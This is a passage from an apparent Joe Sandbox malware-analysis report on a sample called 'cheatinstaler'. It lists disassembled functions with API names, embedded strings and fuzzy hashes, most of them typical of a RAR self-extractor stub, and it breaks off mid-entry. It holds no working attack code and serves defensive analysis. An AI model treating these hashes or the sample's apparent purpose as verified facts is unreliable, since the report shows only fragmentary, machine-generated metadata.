                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID: .rar$exe$rar$sfx
                                                                                  • API String ID: 3668304517-630704357
                                                                                  • Opcode ID: 93dbb7d74f849ef92666457f8e9f641f008dc657da5001eee78cfd1c0618c12a
                                                                                  • Instruction ID: 69234210f91ab7377f60d49eda7973e4ae3a1fc1a178743cd287e2ad545cfb7e
                                                                                  • Opcode Fuzzy Hash: 93dbb7d74f849ef92666457f8e9f641f008dc657da5001eee78cfd1c0618c12a
                                                                                  • Instruction Fuzzy Hash: 8FA1A122A14A4680EA04AF37D4E52FCA361FF40BA8F985231ED5D076EADF3CE545C360
                                                                                  Function 00007FF754575CE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: abort$CallEncodePointerTranslator
                                                                                  • String ID: MOC$RCC
                                                                                  • API String ID: 2889003569-2084237596
                                                                                  • Opcode ID: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                                  • Instruction ID: 6fb44ae6f70d5024178003ee95594d45bca4cb891eb8d14fddd0d0061891ecca
                                                                                  • Opcode Fuzzy Hash: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                                  • Instruction Fuzzy Hash: A991BFB3A08B958AE710EF66E4903ADBBA0F704788F584139EE4D17B55DF38D295CB40
                                                                                  Function 00007FF754574F80 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                  • String ID: csm$f
                                                                                  • API String ID: 2395640692-629598281
                                                                                  • Opcode ID: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                                                  • Instruction ID: 759ad9493ba1c1f0a802c3951c61b3550b3d87df1046c1d6d615e97111d3e4f4
                                                                                  • Opcode Fuzzy Hash: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                                                  • Instruction Fuzzy Hash: 1451C632A1960686EB14EF17E494B29B795FB40BC8F988030DA5E47B48DF78EA41C790
                                                                                  Function 00007FF75454CEE0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 139COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
                                                                                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                  • API String ID: 2102711378-639343689
                                                                                  • Opcode ID: 4ad8962ae40659baaf1511d456c0931157e13c4a94880edc0a22eb1ae19da66a
                                                                                  • Instruction ID: 99d225fedd3a44ccc3e93a5caca19aeea6787f980e9cc918a068f84861ec98f0
                                                                                  • Opcode Fuzzy Hash: 4ad8962ae40659baaf1511d456c0931157e13c4a94880edc0a22eb1ae19da66a
                                                                                  • Instruction Fuzzy Hash: 3E51C562F1874245FB11FF67D8E02BDA361AF857A4F980130DE1D1B696EE3CA589C220
                                                                                  Function 00007FF754567B28 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Show$Rect
                                                                                  • String ID: RarHtmlClassName
                                                                                  • API String ID: 2396740005-1658105358
                                                                                  • Opcode ID: 95333b9ad2bfddc98b100d65ee3ae7a1141886215ecc40d0d40dcbf9cb340d19
                                                                                  • Instruction ID: 0c42e94229bd7c675b24ef3844a8b955d62f6c9d5d04e9638cae15f900e42065
                                                                                  • Opcode Fuzzy Hash: 95333b9ad2bfddc98b100d65ee3ae7a1141886215ecc40d0d40dcbf9cb340d19
                                                                                  • Instruction Fuzzy Hash: 3C519622A09B8296EA24AF33E4A437EE360FF85780F884435DE4E47B55DF3CE4458710
                                                                                  Function 00007FF75456FD0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                                                  • String ID: sfxcmd$sfxpar
                                                                                  • API String ID: 3540648995-3493335439
                                                                                  • Opcode ID: f7f09a535254ba7702706040489ea7439e58d63b661cc729fc85acc9afefde13
                                                                                  • Instruction ID: 60769751683c5866348258cb04f979a24cc320dae7fcf2393d110e9da13d7298
                                                                                  • Opcode Fuzzy Hash: f7f09a535254ba7702706040489ea7439e58d63b661cc729fc85acc9afefde13
                                                                                  • Instruction Fuzzy Hash: 52317032E14A4694FB04AF66E4E41ACB371FB44BD8F980131EE5D177A9DE38E041C364
                                                                                  Function 00007FF75456FED4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                  • API String ID: 0-56093855
                                                                                  • Opcode ID: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                                                  • Instruction ID: c3a946251058990285bb608352954f70dd7e6a639354fb5ebb6a0ae318f58eff
                                                                                  • Opcode Fuzzy Hash: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                                                  • Instruction Fuzzy Hash: F921EB22E09B87A1FA11EF27B8E4174E3A1BB49B85F9C0036E94D47765DE3CE584C360
                                                                                  Function 00007FF75457BFB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                  • API String ID: 4061214504-1276376045
                                                                                  • Opcode ID: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                                                  • Instruction ID: cfccd5f97246ecf71c96679111f367d0f4260cfb23b7d98c82f5470a680b11ac
                                                                                  • Opcode Fuzzy Hash: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                                                  • Instruction Fuzzy Hash: DBF04F21A19A4281FE55AF12F4E427DA3A0FF88BD4F9C1035D94F46665DE3CE588C720
                                                                                  Function 00007FF7545845C0 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                  • String ID:
                                                                                  • API String ID: 3215553584-0
                                                                                  • Opcode ID: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                                                                                  • Instruction ID: c83c7e85409849f65edd47d060aca5e9aa08020c8f77f64452d2017cd920c25d
                                                                                  • Opcode Fuzzy Hash: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                                                                                  • Instruction Fuzzy Hash: 9881F522F1864285F711BF2788E06BDB6A0BB46B94FA84135CD0E53695EF3CA446D730
                                                                                  Function 00007FF754553AF8 Relevance: 7.7, APIs: 5, Instructions: 164filetimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 2398171386-0
                                                                                  • Opcode ID: 8c9e27b33bb60ec2ca70bdd01c92279f10c16d884dcde86fae8fb32e95875df8
                                                                                  • Instruction ID: 2f115ffcda4387fa67532cbdc4975b9dab44a620147713fa92ef39d9efe91934
                                                                                  • Opcode Fuzzy Hash: 8c9e27b33bb60ec2ca70bdd01c92279f10c16d884dcde86fae8fb32e95875df8
                                                                                  • Instruction Fuzzy Hash: F151D422B04A4259FB20EF76F4A02FDA3B1AF447A8F884635EE1D477D4EE3891158310
                                                                                  Function 00007FF754583F34 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 3659116390-0
                                                                                  • Opcode ID: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                                                                                  • Instruction ID: e497c6227d9087c38bc62e7b2c7869129c012e9ec4e56db58f454a29a1d64eee
                                                                                  • Opcode Fuzzy Hash: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                                                                                  • Instruction Fuzzy Hash: 9251F132A14A6189F711DF26E8903ACBBB0FB45798F588135CE4E57B99EF38D145C720
                                                                                  Function 00007FF754571E00 Relevance: 7.6, APIs: 5, Instructions: 137memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$AllocString
                                                                                  • String ID:
                                                                                  • API String ID: 262959230-0
                                                                                  • Opcode ID: 78f40180803c07e16f725ce8caa782a98fbfbfcb68ebd86bc368cce44f009025
                                                                                  • Instruction ID: 4af3325c2704ae864af2807b00419fa483a904ecf6c41add63508bb6f2454a4d
                                                                                  • Opcode Fuzzy Hash: 78f40180803c07e16f725ce8caa782a98fbfbfcb68ebd86bc368cce44f009025
                                                                                  • Instruction Fuzzy Hash: FA41B431A0964689FB14AF2394A0379A295FF44BE4F9C4634EA6E477D5DF3CD2418320
                                                                                  Function 00007FF75457F414 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc
                                                                                  • String ID:
                                                                                  • API String ID: 190572456-0
                                                                                  • Opcode ID: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                                                  • Instruction ID: d25f5511539ac1438cb15f8e966f81a90b99232eeb2af277581ab711d22bf833
                                                                                  • Opcode Fuzzy Hash: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                                                  • Instruction Fuzzy Hash: EF410563B19A4282FA15EF13A8A4575B396BF04BD0F9D4535EE1D4B748EE3CE1018324
                                                                                  Function 00007FF7545856D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _set_statfp
                                                                                  • String ID:
                                                                                  • API String ID: 1156100317-0
                                                                                  • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                  • Instruction ID: 03f32480b8af8c606c2ed8172e5ecc6722b4dfa4cb40975c503401ccbfb3f27d
                                                                                  • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                  • Instruction Fuzzy Hash: CE11C436E1C60F81F6543B26E5F1379A5826F443E0FFCC270EA7E865D6CE2CA8444129
                                                                                  Function 00007FF75456FE24 Relevance: 7.5, APIs: 5, Instructions: 29windowsynchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                                                  • String ID:
                                                                                  • API String ID: 3621893840-0
                                                                                  • Opcode ID: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                                                                                  • Instruction ID: 94027cbbfba0a7c3ca6f8930f69cb25d5ea48fb13870a84d661d28dd6484aa2e
                                                                                  • Opcode Fuzzy Hash: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                                                                                  • Instruction Fuzzy Hash: E8F0FF22F2855692F750AF22E4F9A7AB251FFE4B45FD81030E54E419949E2CD549C720
                                                                                  Function 00007FF75457625C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: __except_validate_context_recordabort
                                                                                  • String ID: csm$csm
                                                                                  • API String ID: 746414643-3733052814
                                                                                  • Opcode ID: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                                                  • Instruction ID: 5c621e54f33d27ca59e702019073c21751d6252a9216086ddad1e3a55d66640e
                                                                                  • Opcode Fuzzy Hash: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                                                  • Instruction Fuzzy Hash: 2571B17250869286DB60AF2690E077DFBA1FB01BE9F988135DA4C07A85CF3CD699C750
                                                                                  Function 00007FF7545780F4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
